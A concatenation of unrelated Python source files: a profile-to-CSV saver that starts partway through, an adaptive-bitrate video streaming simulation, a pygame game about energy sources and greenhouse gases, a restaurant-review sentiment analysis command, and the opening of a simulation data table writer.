        # Fire a request every `threshold` ids, and once more for the tail.
        if count % threshold == 0 or count == len(ids):
            response = query(response)
            save_response(response, response_file)
            str_ids = ""
            print("Got " + str(count) + " profiles...")
            response = []
    #print("Data acquired.")
# Function for flattening nested dictionaries.
# isInstance checks whether the data structure of a particular type
# Heavy if-else usage here is because of complicated situations when there is
# dictionary inside list inside dictionary
def flatten_dict(d, parent_key='', sep='_'):
    """Recursively flatten a nested dict into a single-level dict.

    Nested dict keys are joined with *sep* (e.g. {"a": {"b": 1}} ->
    {"a_b": 1}); list elements are enumerated from 1 (e.g. {"a": [1, 2]}
    -> {"a_1": 1, "a_2": 2}), recursing into dict elements.

    NOTE(review): for lists below the top level the parent key is joined
    without a separator (parent_key + k) -- kept as-is for backward
    compatibility with existing CSV headers.
    """
    items = []
    for k, v in d.items():
        new_key = parent_key + sep + k if parent_key else k
        if isinstance(v, dict):
            if v:
                items.extend(flatten_dict(v, new_key, sep=sep).items())
            else:
                # Preserve empty dicts so the column still appears.
                items.append((new_key, v))
        # BUG FIX: this branch was a bare "if", so a nested dict was both
        # flattened above AND appended raw by the "else" below; "elif"
        # makes the three cases mutually exclusive.
        elif v and isinstance(v, list):
            count = 1
            for i in v:
                new_key = parent_key + k + sep + str(count)
                if isinstance(i, dict):
                    items.extend(flatten_dict(i, new_key, sep=sep).items())
                else:
                    items.append((new_key, i))
                count += 1
        else:
            items.append((new_key, v))
    return dict(items)
# Constructing headers for CSV
def construct_header(response, basic_parameters=basic_parameters):
    """Build the CSV header: the basic parameters first, followed by
    every remaining flattened field name in sorted order."""
    seen = set()
    for person in response:
        seen.update(flatten_dict(person))
    extras = sorted(seen - set(basic_parameters))
    return basic_parameters + extras
# Parsing data and saving in CSV file
def save_response(response, response_file):
    """Append each profile dict from a users.get response to a text file,
    one Python-literal dict per line.

    process_data() reads this file back with one ast.literal_eval per
    line, so the format must be exactly ``repr(dict) + newline``.

    BUG FIX: the old code wrote str() of a utf-8 *bytes* object, which
    produced "b'...'" text with the newline escaped inside the repr --
    every record landed on a single line that literal_eval could never
    parse. Write the plain dict repr plus a real newline instead.
    """
    with open(response_file, 'a', encoding='utf-8') as f:
        for profile in response["response"]:
            f.write(str(profile) + "\n")
# with open(output, "a") as output:
# output.write(response)
def process_data(result_file, response_file, delete_response):
    """Parse the saved raw responses and write them to a CSV file.

    Reads one Python-literal profile dict per line from response_file,
    flattens each profile, and writes a CSV with a unified header.
    Optionally deletes the raw response file afterwards.
    """
    # Load every saved profile back into memory.
    response = []
    with open(response_file, 'r', encoding='utf-8') as f:
        for line in f:
            response.append(ast.literal_eval(line.rstrip('\n')))

    # Build the unified header across all profiles.
    fieldnames = construct_header(response)

    # BUG FIX (Python 3 port): the csv module wants a text-mode file
    # opened with newline='' (not "wb"), values no longer need manual
    # utf-8 encoding, and `basestring` no longer exists -- use str.
    with open(result_file, "w", newline='', encoding='utf-8') as output:
        writer = csv.writer(output, quotechar='"', quoting=csv.QUOTE_ALL)
        writer.writerow(fieldnames)
        for person in response:
            flat = flatten_dict(person)
            person_data = []
            for item in fieldnames:
                if item in flat:
                    value = flat[item]
                    person_data.append(value if isinstance(value, str) else str(value))
                else:
                    # Field absent for this profile -> empty cell.
                    person_data.append('')
            writer.writerow(person_data)

    if delete_response:
        os.remove(response_file)
|
from ipaddress import summarize_address_range
import os
from tqdm import tqdm
import numpy as np
import time
# import envs.env_v2 as env
import envs.fixed_env_real_bw_v2 as env_oracle_v2
# import envs.env as env
import envs.fixed_env as env_test
import envs.fixed_env_real_bw as env_oracle
from envs import load_trace
# Available video bitrates the ABR policy can choose from.
VIDEO_BIT_RATE = [300,750,1200,1850,2850,4300] # kbps
# Total number of chunks in the test video.
TOTAL_CHUNK_NUM = 149
# Rebuffering penalty weight used in the per-chunk reward.
REBUF_PENALTY_LOG = 8
# Penalty weight on quality switches between consecutive chunks.
SMOOTH_PENALTY = 0.5
S_INFO = 16 # number of state features -- presumably; TODO confirm against the env
S_LEN = 2 # maximum length of states
C_LEN = 10 # content length
# Unit conversion factor (e.g. ms -> s when dividing timestamps).
M_IN_K = 1000
# Directory of pre-processed ("cooked") network throughput traces.
TRAIN_TRACES = './envs/traces/pre_webget_1608/cooked_traces/'
# Prefix under which per-trace simulation logs are written.
SUMMARY_DIR = './Results/sim'
def main():
    """Run an oracle/MPC-style ABR simulation over every network trace.

    For each trace, repeatedly fetches video chunks from the simulated
    environment, logs per-chunk QoE statistics to a per-trace file under
    SUMMARY_DIR, and asks the environment to solve for the best next
    bitrate over a short look-ahead horizon.
    """
    start = time.process_time()
    # # test(TEST_MODEL, TEST_TRACES, LOG_FILE)
    ## load the training traces
    # all_cooked_time, all_cooked_bw, _ = load_trace.load_trace(TRAIN_TRACES)
    ## -----------------------------------configures-------------------------------------------------
    video = 'Avengers'
    video_size_file = './envs/video_size/' + video + '/video_size_'
    video_psnr_file = './envs/video_psnr/' + video + '/chunk_psnr'
    Train_traces = TRAIN_TRACES
    log_path_ini = SUMMARY_DIR

    all_cooked_time, all_cooked_bw, all_file_names = load_trace.load_trace(Train_traces)
    # train_env = env.Environment(all_cooked_time=all_cooked_time, all_cooked_bw=all_cooked_bw, video_size_file= video_size_file, video_psnr_file=video_psnr_file)
    # train_env.set_env_info(S_INFO, S_LEN, C_LEN, TOTAL_CHUNK_NUM, VIDEO_BIT_RATE, REBUF_PENALTY_LOG, SMOOTH_PENALTY)
    train_env_1 = env_oracle_v2.Environment(all_cooked_time=all_cooked_time, all_cooked_bw=all_cooked_bw, video_size_file= video_size_file, video_psnr_file=video_psnr_file)
    train_env_1.set_env_info(S_INFO, S_LEN, C_LEN, TOTAL_CHUNK_NUM, VIDEO_BIT_RATE, REBUF_PENALTY_LOG, SMOOTH_PENALTY)

    # Initial bitrate index and QoE bookkeeping.
    bit_rate = int(2)
    last_quality = 0
    time_stamp = 0.
    rebuff_p = REBUF_PENALTY_LOG
    smooth_p = SMOOTH_PENALTY
    # Look-ahead horizon (in chunks) for the optimizer.
    mpc_horizon = 3
    train_env = train_env_1
    # model.load_state_dict(model.state_dict())
    all_file_name = all_file_names

    # One log file per trace, named after the trace file.
    log_path = log_path_ini + '_' + all_file_name[train_env.trace_idx]
    log_file = open(log_path, 'w')
    time_stamp = 0

    for video_count in tqdm(range(len(all_file_name))):
        while True:
            # Download the next chunk at the chosen bitrate and observe
            # the resulting network/player measurements.
            delay, sleep_time, buffer_size, rebuf, \
                video_chunk_size, next_video_chunk_sizes, \
                next_video_chunk_psnrs, end_of_video, video_chunk_remain, \
                curr_chunk_sizes, curr_chunk_psnrs = train_env.get_video_chunk(bit_rate)

            time_stamp += delay  # in ms
            time_stamp += sleep_time  # in ms

            # reward is video quality - rebuffer penalty - smooth penalty
            curr_quality = curr_chunk_psnrs[bit_rate]
            reward = curr_quality \
                - rebuff_p * rebuf \
                - smooth_p * np.abs(curr_quality - last_quality)
            last_quality = curr_quality

            log_file.write(str(time_stamp / M_IN_K) + '\t' +
                           str(VIDEO_BIT_RATE[bit_rate]) + '\t' +
                           str(buffer_size) + '\t' +
                           str(rebuf) + '\t' +
                           str(video_chunk_size) + '\t' +
                           str(delay) + '\t' +
                           str(reward) + '\n')
            log_file.flush()

            # future chunks length (try 4 if that many remaining)
            last_index = int(TOTAL_CHUNK_NUM - video_chunk_remain - 1)
            future_chunk_length = mpc_horizon
            if (TOTAL_CHUNK_NUM - last_index < mpc_horizon):
                future_chunk_length = TOTAL_CHUNK_NUM - last_index

            # Ask the oracle environment for the best next bitrate over
            # the look-ahead window.
            opt_a = train_env.solving_opt(buffer_size, bit_rate, future_chunk_length, rebuff_p, smooth_p, 6)
            bit_rate = opt_a

            if end_of_video:
                # Reset per-trace state and rotate the log file.
                last_quality = 0
                log_file.write('\n')
                log_file.close()
                time_stamp = 0
                if video_count + 1 >= len(all_file_name):
                    break
                else:
                    log_path = log_path_ini + '_' + all_file_name[train_env.trace_idx]
                    log_file = open(log_path, 'w')
                break

    end = time.process_time()
    print('finish all in %s' % str(end - start))
# Script entry point.
if __name__ == '__main__':
    main()
import pygame
from random import randint, choice
import config
# tutorial:
import tutorial
tutorial.__dict__ # because flake8 ;-;
# Boiler-plate: initialize pygame and create the main window.
pygame.init()
window = pygame.display.set_mode((config.window_width, config.window_height))
pygame.display.set_caption(config.window_title)
clock = pygame.time.Clock()  # used to cap the frame rate each tick
all_icons = pygame.sprite.Group() # All icons on the screen are put into this Group object.
# Fonts used:
pygame.font.init()
arial = pygame.font.SysFont('Arial MT', 30)   # UI labels / stat-bar titles
big_arial = pygame.font.SysFont('Arial', 120) # large text
# Initial game state values:
atmospheric_ghg_levels = 0    # accumulated greenhouse gas; pollute() adds to it every frame
num_of_green_energies = 0     # count of green energy sources (worth 1 energy each)
num_of_fossil_fuels = 50      # count of fossil fuel plants (worth 20 energy each)
num_of_ghg_capture_techs = 0  # count of GHG capture technologies (1 offset point each)
energy_output = 20 * num_of_fossil_fuels + num_of_green_energies
capture_offset = num_of_ghg_capture_techs
percent_fossil_fuel = 100     # share of energy sources that are fossil fuels
percent_green_energy = 0      # share of energy sources that are green energy
def percentage_update():
    """Update the percentage of energy resources that are fossil fuels
    and green energies.

    ROBUSTNESS FIX: guard against division by zero -- right-clicking
    away every energy source leaves both counts at 0, which previously
    raised ZeroDivisionError. Both percentages fall to 0 in that case.
    """
    global percent_fossil_fuel, percent_green_energy
    total = num_of_fossil_fuels + num_of_green_energies
    if total == 0:
        # No energy sources remain at all.
        percent_fossil_fuel = 0
        percent_green_energy = 0
        return
    percent_fossil_fuel = int(100 * (num_of_fossil_fuels / total))
    percent_green_energy = int(100 * (num_of_green_energies / total))
def pollute():
    """Add this frame's emissions -- one unit of greenhouse gas per
    fossil fuel plant -- to the atmospheric total."""
    global atmospheric_ghg_levels
    atmospheric_ghg_levels = atmospheric_ghg_levels + num_of_fossil_fuels
def check_if_lost():
    """The game is lost when GHG levels reach the limit or energy output
    drops below demand."""
    over_ghg_limit = atmospheric_ghg_levels >= config.greenhouse_gas_limit
    under_demand = energy_output < config.energy_demand
    return over_ghg_limit or under_demand
def check_if_won():
    """The game is won once the capture offset covers the remaining
    fossil-fuel share."""
    return percent_fossil_fuel <= capture_offset
def draw_ghg_levels_bar():
    """Draws the Atmospheric GHG Levels stat bar onto the screen"""
    if atmospheric_ghg_levels <= config.greenhouse_gas_limit:
        # Gray background track...
        pygame.draw.rect(window, config.gray,
                         pygame.Rect(config.icon_spacing,
                                     1.5 * config.icon_spacing,
                                     config.stat_bar_width,
                                     config.stat_bar_height))
        # ...with a red fill proportional to the current GHG level.
        pygame.draw.rect(window, config.dark_red,
                         pygame.Rect(config.icon_spacing,
                                     1.5 * config.icon_spacing,
                                     (config.stat_bar_width * atmospheric_ghg_levels)
                                     / config.greenhouse_gas_limit,
                                     config.stat_bar_height))
    else:
        # Past the limit: clamp the display to a full red bar.
        pygame.draw.rect(window, config.dark_red,
                         pygame.Rect(config.icon_spacing,
                                     1.5 * config.icon_spacing,
                                     config.stat_bar_width,
                                     config.stat_bar_height))
    text = arial.render('Atmospheric GHG Levels', False, (0, 0, 0))
    window.blit(text, (config.icon_spacing, 0.5 * config.icon_spacing))
def draw_energy_demand_bar():
    """Draws the Energy Demand stat bar onto the screen """
    if energy_output <= 2 * config.energy_demand:
        # Gray background track...
        pygame.draw.rect(window, config.gray,
                         pygame.Rect(config.icon_spacing,
                                     1.5 * config.icon_spacing + config.window_height / 5,
                                     config.stat_bar_width,
                                     config.stat_bar_height))
        # ...with a yellow fill; the bar's midpoint represents exactly
        # meeting demand (output / demand scaled to half the width).
        pygame.draw.rect(window, config.yellow,
                         pygame.Rect(config.icon_spacing,
                                     1.5 * config.icon_spacing + config.window_height / 5,
                                     (config.stat_bar_width / 2)
                                     * energy_output / config.energy_demand,
                                     config.stat_bar_height))
    else:
        # Output beyond twice the demand: clamp to a full bar.
        pygame.draw.rect(window, config.yellow,
                         pygame.Rect(config.icon_spacing,
                                     1.5 * config.icon_spacing + config.window_height / 5,
                                     config.stat_bar_width,
                                     config.stat_bar_height))
    # Black tick at the halfway point marking the demand threshold.
    pygame.draw.rect(window, config.black,
                     pygame.Rect(config.icon_spacing + config.stat_bar_width / 2 - 2,
                                 1.5 * config.icon_spacing + config.window_height / 5 - 4,
                                 4,
                                 config.stat_bar_height + 8))
    text = arial.render('Energy Output & Demand', False, (0, 0, 0))
    window.blit(text, (config.icon_spacing, 0.5 * config.icon_spacing + config.window_height / 5))
def draw_ratio_bar():
    """Draws the Green Energy : Fossil Fuels ratio stat bar onto the screen"""
    # Brown background represents the fossil-fuel share...
    pygame.draw.rect(window, config.darkish_brown,
                     pygame.Rect(config.icon_spacing,
                                 1.5 * config.icon_spacing + 2 * config.window_height / 5,
                                 config.stat_bar_width,
                                 config.stat_bar_height))
    # ...overlaid by a green fill sized to the green-energy percentage.
    pygame.draw.rect(window, config.green,
                     pygame.Rect(config.icon_spacing,
                                 1.5 * config.icon_spacing + 2 * config.window_height / 5,
                                 config.stat_bar_width * percent_green_energy / 100,
                                 config.stat_bar_height))
    text = arial.render('Green Energy : Fossil Fuels', False, (0, 0, 0))
    window.blit(text, (config.icon_spacing, 0.5 *
                       config.icon_spacing + 2 * config.window_height / 5))
def draw_emission_offset_bar():
    """Draws the Emissions Offset stat bar onto the screen"""
    # Gray background track...
    pygame.draw.rect(window, config.gray,
                     pygame.Rect(config.icon_spacing,
                                 1.5 * config.icon_spacing + 3 * config.window_height / 5,
                                 config.stat_bar_width,
                                 config.stat_bar_height))
    # ...with a blue fill proportional to the number of capture techs
    # (scaled against a fixed denominator of 100).
    pygame.draw.rect(window, config.grayish_light_blue,
                     pygame.Rect(config.icon_spacing,
                                 1.5 * config.icon_spacing + 3 * config.window_height / 5,
                                 config.stat_bar_width * num_of_ghg_capture_techs / 100,
                                 config.stat_bar_height))
    text = arial.render('Emissions Offset', False, (0, 0, 0))
    window.blit(text, (config.icon_spacing, 0.5 *
                       config.icon_spacing + 3 * config.window_height / 5))
def draw_stat_bars():
    """Draws all of the stat bars onto the screen and instructions to pause"""
    draw_ghg_levels_bar()
    draw_energy_demand_bar()
    draw_ratio_bar()
    draw_emission_offset_bar()
    # On-screen hint for the pause control.
    text = arial.render('Press P to Pause', False, (0, 0, 0))
    window.blit(text, (config.icon_spacing + config.stat_bar_width / 4,
                       0.5 * config.icon_spacing + 4 * config.window_height / 5
                       + config.stat_bar_height / 2))
class Icon(pygame.sprite.Sprite):
    def __init__(self, energy_source, left_coordinate):
        """
        Each icon has an image, an energy source, an energy type, and an
        x-coordinate. Newly generated icons always start at the top of
        the screen, i.e. their initial y-coordinates are always 0.
        """
        pygame.sprite.Sprite.__init__(self)
        self.image = energy_source
        self.rect = self.image.get_rect()
        # Start just above the visible area so the icon scrolls in.
        self.rect.bottom = 0
        self.rect.left = left_coordinate
        # Classify the icon by which config collection its image belongs to.
        # NOTE(review): create_row() spawns capture icons using
        # config.ghg_capture_technology, while this comparison uses
        # config.ghg_capture_tech -- if those are two different config
        # names, capture icons never get a .type attribute and
        # icon_clicked() will raise AttributeError. Confirm against config.py.
        if energy_source in config.fossil_fuel_types:
            self.type = 'fossil fuel'
        elif energy_source in config.green_energy_types:
            self.type = 'green energy'
        elif energy_source == config.ghg_capture_tech:
            self.type = 'ghg capture tech'

    def update(self):
        """
        Every frame each icon falls down the screen at the specified
        speed. When it reaches the bottom it is removed.
        """
        self.rect.y += config.icon_speed
        if self.rect.top > config.window_height:
            self.kill()
def icon_clicked():
    """This runs if an icon is clicked.

    Left-click builds the clicked icon's energy source (updating counts,
    energy output, and the capture offset); right-click dismantles one of
    that type instead. The clicked icon is removed either way.

    NOTE(review): relies on the module-level names ``event`` and ``icon``
    being set by the main event loop before this is called.
    """
    global num_of_fossil_fuels, num_of_green_energies, num_of_ghg_capture_techs
    global energy_output, capture_offset
    if event.button == 1:  # Left-click
        if icon.type == 'fossil fuel':
            # Each fossil fuel plant contributes 20 energy.
            num_of_fossil_fuels += 1
            energy_output += 20
        elif icon.type == 'green energy':
            # Each green energy source contributes 1 energy.
            num_of_green_energies += 1
            energy_output += 1
        else:
            num_of_ghg_capture_techs += 1
            capture_offset += 1
        print([num_of_ghg_capture_techs, num_of_green_energies, num_of_fossil_fuels, energy_output])
        percentage_update()
        icon.kill()
    elif event.button == 3:  # Right-click
        # Dismantle one source of the clicked type, if any remain.
        if icon.type == 'fossil fuel' and num_of_fossil_fuels > 0:
            num_of_fossil_fuels -= 1
            energy_output -= 20
        elif icon.type == 'green energy' and num_of_green_energies > 0:
            num_of_green_energies -= 1
            energy_output -= 1
        elif num_of_ghg_capture_techs > 0:
            num_of_ghg_capture_techs -= 1
            capture_offset -= 1
        print([num_of_ghg_capture_techs, num_of_green_energies, num_of_fossil_fuels, energy_output])
        percentage_update()
        icon.kill()
    else:
        # Ignore other mouse buttons.
        pass
"""
This list keeps track of all the rows created. It is used to create the
first row, and also to tell where the previous row created is located so
you know when enough space has gone by to create the next row.
"""
list_of_rows = []
def create_row():
    """This creates a list of icons. It does not display them to the screen."""
    global list_of_rows
    row = []
    for i in range(config.number_of_icons_in_a_row):
        # 1-in-(rarity+1) chance of a capture-tech icon; otherwise split
        # evenly between fossil fuels and green energies.
        n = randint(0, config.ghg_capture_icon_rarity)
        if n == config.ghg_capture_icon_rarity:
            # NOTE(review): Icon.__init__ classifies capture icons via
            # config.ghg_capture_tech -- confirm it is the same config
            # value as ghg_capture_technology used here.
            energy = config.ghg_capture_technology
        elif n % 2 == 0:
            energy = choice(config.fossil_fuel_types)
        else:
            energy = choice(config.green_energy_types)
        # Icons are 64px wide and laid out with icon_spacing gaps.
        icon = Icon(energy, config.first_x_coordinate + i * (64 + config.icon_spacing))
        row.append(icon)
    list_of_rows.append(row)
    return row
def display_row():
    """This creates a row of icons and displays them to the screen at the appropriate location."""
    global list_of_rows
    if len(list_of_rows) == 0:
        # Very first row of the game: nothing to measure spacing against.
        row = create_row()
        for icon in row:
            all_icons.add(icon)
    else:
        for i in range(config.number_of_icons_in_a_row):
            if list_of_rows[-1][i].rect.top < config.icon_spacing:
                # The newest row has not scrolled far enough down yet.
                pass
            else:
                # NOTE: create_row() appends to list_of_rows, so after the
                # first spawn list_of_rows[-1] is the brand-new row (still at
                # the top of the screen) and the remaining iterations take the
                # branch above -- in practice only one row is created per call.
                row = create_row()
                for icon in row:
                    all_icons.add(icon)
# Used to make an FPS counter:
frames = 0  # total frames rendered so far; drives the every-10-frames refresh below
fps_text = arial.render('FPS: ?/60', False, (0, 0, 0))  # FPS counter text on screen
def fps_counter():
    """Blit a frames-per-second readout in the bottom-left corner.

    The rendered surface is cached in the module-level ``fps_text`` and only
    re-rendered every tenth frame, since text rendering is comparatively
    expensive. ``frames`` is only read, so it needs no global declaration.
    """
    global fps_text
    if frames % 10 == 0:  # refresh the cached surface every 10 frames
        fps_displayed = str(int(clock.get_fps()))
        fps_text = arial.render(f'FPS: {fps_displayed}/60', False, (0, 0, 0))
    window.blit(fps_text, (0, config.window_height - 20))
pause = False
running = True
tint = 0


# Colour ramps for the end-of-game fade, expressed as functions of the fade
# progress t in [0, 1]. The original built these as source-code strings and
# re-eval()ed them on every frame -- needless eval() use, replaced here by
# ordinary functions returning the exact same tuples.
def _lost_colour(t):
    """Colour ramp used when the game is lost (fade towards dark blue)."""
    return (255 - (64 * t), 255 - (192 * t), 255 - (255 * t))


def _won_colour(t):
    """Colour ramp used when the game is won (fade towards green)."""
    return (255 - (255 * t), 255, 255 - (128 * t))


while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        elif event.type == pygame.MOUSEBUTTONDOWN:
            mouse_position = pygame.mouse.get_pos()
            # Dispatch the click to every icon under the cursor.
            for icon in all_icons:
                if icon.rect.collidepoint(mouse_position):
                    icon_clicked()
        # Pause sequence: 'p' enters a blocking loop until 'p' again (or quit).
        elif event.type == pygame.KEYUP:
            if event.key == pygame.K_p:
                pause = True
                while pause:
                    for event2 in pygame.event.get():
                        if event2.type == pygame.KEYUP:
                            if event2.key == pygame.K_p:
                                pause = False
                        elif event2.type == pygame.QUIT:
                            pause = False
                            running = False
    # Per-frame rendering.
    window.fill(config.white)
    pollute()
    display_row()
    draw_stat_bars()
    all_icons.update()
    all_icons.draw(window)
    fps_counter()
    frames += 1
    pygame.display.update()
    # End-of-game handling: fade the screen, then show the result text.
    if check_if_lost() or check_if_won():
        pause = True  # pause the game
        pygame.display.update()
        if check_if_lost():
            colour_at = _lost_colour
        elif check_if_won():
            colour_at = _won_colour
        else:  # unreachable (outer condition guarantees one of the two)
            continue
        # Pass 1: multiplicative tint over the last rendered frame.
        tint = 0
        while tint <= 1:
            window.fill(colour_at(tint), special_flags=pygame.BLEND_MULT)
            pygame.display.update()
            tint += 0.05
            clock.tick(config.fps)
        # Pass 2: plain fill fading to the final colour.
        # (The original also computed an unused ``from_color`` here; removed.)
        tint = 0
        while tint <= 1:
            window.fill(colour_at(tint))
            pygame.display.update()
            tint += 0.1
            clock.tick(config.fps)
        text = 'You '
        if check_if_lost():
            text += 'lost...'
        elif check_if_won():
            text += 'won!'
        else:  # unreachable, mirrors the guard above
            continue
        ending_text = big_arial.render(text, False, (0, 0, 0))
        window.blit(ending_text, (100, 100))
        pygame.display.update()
        # Keep the window open until the player quits.
        while running:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
            clock.tick(config.fps)
pygame.quit()
|
<reponame>jagoPG/-restaurant-ml-inspector
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2017-2018 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
from tabulate import tabulate
from textblob import TextBlob
from src.application.analysis.english_analysis import EnglishAnalysis
from src.application.analysis.evaluated_word import EvaluatedWord
from src.application.analysis.rated_review_analysis import RatedReviewAnalysis
from src.domain.exception import ReviewIsNotAnalysable
from src.domain.model import KeyPoint
from src.infrastructure.dependency_injector import Dependency
class ProcessRestaurantReviewsCommand(object):
    """Command requesting the analysis of every review belonging to the
    restaurants of a single project.

    It carries only the project identifier; the handler
    (ProcessRestaurantReviews) fetches everything else from its repositories.
    """

    def __init__(self, project_id):
        # Identifier of the project whose restaurant reviews will be processed.
        self.project_id = project_id
class ProcessRestaurantReviews(Dependency):
    """Analyse every review of a project's restaurants and store the
    resulting key points and overall karma in the project's analysis.

    Collaborators (injected after construction):
        project_repository, keyword_repository, review_repository,
        analysis_repository, point_repository, spanish_analyser,
        synonym_reducer
    """

    def __init__(self):
        self.project_repository = None
        self.keyword_repository = None
        self.review_repository = None
        self.analysis_repository = None
        self.point_repository = None
        self.spanish_analyser = None
        self.synonym_reducer = None
        self._english_reviews = []
        self._spanish_reviews = []

    def invoke(self, command):
        """Run the full analysis pipeline for ``command.project_id``."""
        self.__clean_vars()
        project = self.__retrieve_project(command.project_id)
        analysis = project.get_analysis()
        restaurants = self.__retrieve_restaurants(project)
        # Filter reviews and classify reviews
        self.__filter_not_tagged_reviews(restaurants)
        tagged_spanish_results, tagged_english_results = \
            self.__filter_tagged_reviews(restaurants)
        # Analyse reviews
        english_results = self.__process_english_reviews(self._english_reviews)
        spanish_results = self.__process_spanish_reviews(self._spanish_reviews)
        # Perform word equivalence.
        # BUG FIX: the results were previously passed as positional logging
        # arguments with a non-string first argument, which makes the logging
        # module raise a formatting error whenever DEBUG is enabled. Use a
        # real format string with lazy %-style arguments instead.
        logging.debug(
            'results: en=%s es=%s tagged_en=%s tagged_es=%s',
            english_results,
            spanish_results,
            tagged_english_results,
            tagged_spanish_results
        )
        english_results = self.__mix_results(
            english_results, tagged_english_results
        )
        spanish_results = self.__mix_results(
            spanish_results, tagged_spanish_results
        )
        # Mix depending on synonyms
        self.synonym_reducer.clean()
        self.synonym_reducer.reduce(english_results, 'en')
        self.synonym_reducer.reduce(spanish_results, 'es')
        # Summarize data
        self.__store_conclusions(analysis, self.synonym_reducer.words)

    def __clean_vars(self):
        # Reset per-invocation state so repeated invokes don't accumulate.
        self._english_reviews = []
        self._spanish_reviews = []

    def __retrieve_project(self, project_id):
        return self.project_repository.get_of_id(project_id)

    @staticmethod
    def __retrieve_restaurants(project):
        restaurants = []
        for restaurant in project.restaurants:
            restaurants.append(restaurant)
        return restaurants

    def __filter_tagged_reviews(self, restaurants):
        """Analyse reviews that already carry a rating.

        Returns a ``(spanish_results, english_results)`` tuple.
        """
        tagged_review_analysis = RatedReviewAnalysis(
            self.keyword_repository, restaurants
        )
        tagged_review_analysis.analyse()
        return (
            tagged_review_analysis.get_spanish_results(),
            tagged_review_analysis.get_english_results()
        )

    def __filter_not_tagged_reviews(self, restaurants):
        for restaurant in restaurants:
            self.__process_restaurants_in_social_network(restaurant)

    def __process_restaurants_in_social_network(self, restaurant):
        """Classify every analysable, not-yet-processed review of a restaurant."""
        # Lazy %-args instead of eager string interpolation.
        logging.debug(
            'Analyse %s social network reviews',
            restaurant.source_network.single().name
        )
        reviews = restaurant.get_reviews()
        for review in reviews:
            # Skip spam and reviews that already have a sentiment assigned.
            if review.is_spam or review.sentiment is not None:
                continue
            try:
                self.__classify_review(review)
            except ReviewIsNotAnalysable:
                self.__set_review_not_analysable(review)

    def __classify_review(self, review):
        """Detect the review language and queue it for the matching analyser.

        Raises ReviewIsNotAnalysable for too-short reviews or unsupported
        languages.
        """
        body = review.review_body
        self.__check_review_is_long_enough(body)
        body = TextBlob(review.review_body)
        language = body.detect_language()
        self.__check_review_language_is_supported(language)
        if language == 'en':
            self._english_reviews.append(review)
        elif language == 'es':
            self._spanish_reviews.append(review)

    @staticmethod
    def __check_review_is_long_enough(body):
        # NOTE(review): this measures characters, not words -- confirm intent.
        if not len(body) > 3:
            raise ReviewIsNotAnalysable()

    @staticmethod
    def __check_review_language_is_supported(language):
        if language not in ['en', 'es']:
            raise ReviewIsNotAnalysable()

    def __process_english_reviews(self, english_reviews):
        analysis = EnglishAnalysis(
            self.keyword_repository, english_reviews
        )
        analysis.analyse()
        return analysis.get_results()

    def __process_spanish_reviews(self, spanish_reviews):
        try:
            self.spanish_analyser.analyse(spanish_reviews)
        except ValueError as exception:
            logging.info('%s', exception)
        return self.spanish_analyser.get_results()

    def __set_review_not_analysable(self, review):
        # Unanalysable reviews are flagged as spam so they are skipped
        # on the next invocation.
        review.is_spam = True
        self.review_repository.persist(review)

    def __mix_results(self, *results):
        """Merge several word->data result dicts into one, case-insensitively."""
        lang_words = {}
        for result in results:
            for word, data in result.items():
                self.__store_in_result_list(word, data, lang_words)
        return lang_words

    @staticmethod
    def __store_in_result_list(word, data, lang_words):
        word = word.lower()
        if word in lang_words:
            # Rebind 'word' to the already-merged EvaluatedWord and fold the
            # new karma/appearances into it.
            word = lang_words[word]
            word.add_karma(data.karma)
            for review_id in data.appearances:
                if review_id not in word.appearances:
                    word.add_appearance(review_id)
        else:
            word = EvaluatedWord(word, data.karma, data.appearances)
            lang_words[word.word] = word

    def __store_conclusions(self, analysis, final_report):
        """Persist key points, log a summary table and store the overall karma."""
        karma = 0
        for word, item in final_report.items():
            self.__create_point_instance(word, item, analysis)
        # Show conclusions and CALCULATE KARMA
        header = ['Word', 'Karma', 'Review Appearances']
        data = []
        for word, item in final_report.items():
            current = list()
            current.append(word)
            current.append(final_report[word].karma)
            current.append(final_report[word].count)
            data.append(current)
            # Running, exponentially decaying average over the word karmas.
            karma = (karma + float(final_report[word].karma)) / 2
        logging.debug(tabulate(data, header))
        # Store karma
        analysis.karma = karma
        self.analysis_repository.persist(analysis)

    def __create_point_instance(self, word, item, analysis):
        point = KeyPoint(
            identifier=word,
            karma=item.karma,
            analysis=analysis
        )
        self.point_repository.persist(point)
        analysis.add_key_point(point)
        self.analysis_repository.persist(analysis)
        self.__connect_points_to_reviews(item, point)

    def __connect_points_to_reviews(self, item, point):
        for review in item.appearances:
            review = self.__retrieve_review_of_id(review)
            if review is None:
                continue
            point.add_review(review)

    def __retrieve_review_of_id(self, review_id):
        return self.review_repository.get_of_id(review_id)
|
import os
import logging
import types
import numpy as np
from glob import glob
from types import TupleType, StringType
from aeon import timer
logger = logging.getLogger(name='finmag')
class Tablewriter(object):
    """Incrementally write spatial averages of simulation fields to a text
    table ('ndt') file.

    Two header lines (column names and units) are written on the first
    :meth:`save` call; every subsequent call appends one data row computed
    from the bound simulation object.
    """

    # It is recommended that the comment symbol should end with a
    # space so that there is no danger that it gets mangled up with
    # the 'time' field because some of the code below relies on them
    # being separated by some whitespace.
    comment_symbol = '# '

    def __init__(self, filename, simulation, override=False, entity_order=None, entities=None):
        """Create a writer for `filename` bound to `simulation`.

        filename     -- path of the ndt file to create
        simulation   -- object passed to each entity's 'get' function
        override     -- overwrite an existing file instead of raising
        entity_order -- explicit column order (default: time first, rest sorted)
        entities     -- custom entity dictionary (default: time, m, steps, ...)
        """
        logger.debug("Creating DataWriter for file '%s'" % (filename))
        # formatting for columns (could in principle be customized
        # through extra arguments here)
        precision = 12
        charwidth = 18
        self.float_format = "%" + str(charwidth) + '.' + str(precision) + "g "
        self.string_format = "%" + str(charwidth) + "s "
        # save_head records whether the headings (name and units)
        # have been saved already
        self.save_head = False
        # 'entities' maps a reference name to a dict with keys
        #   'unit'   -- unit string for the second header line,
        #   'get'    -- function taking the simulation object and returning
        #               the data to be saved,
        #   'header' -- column name, or tuple of names for vector data.
        if entities is None:
            self._entities = {}
            self.add_entity('time', {'unit': '<s>',
                                     'get': lambda sim: sim.t,
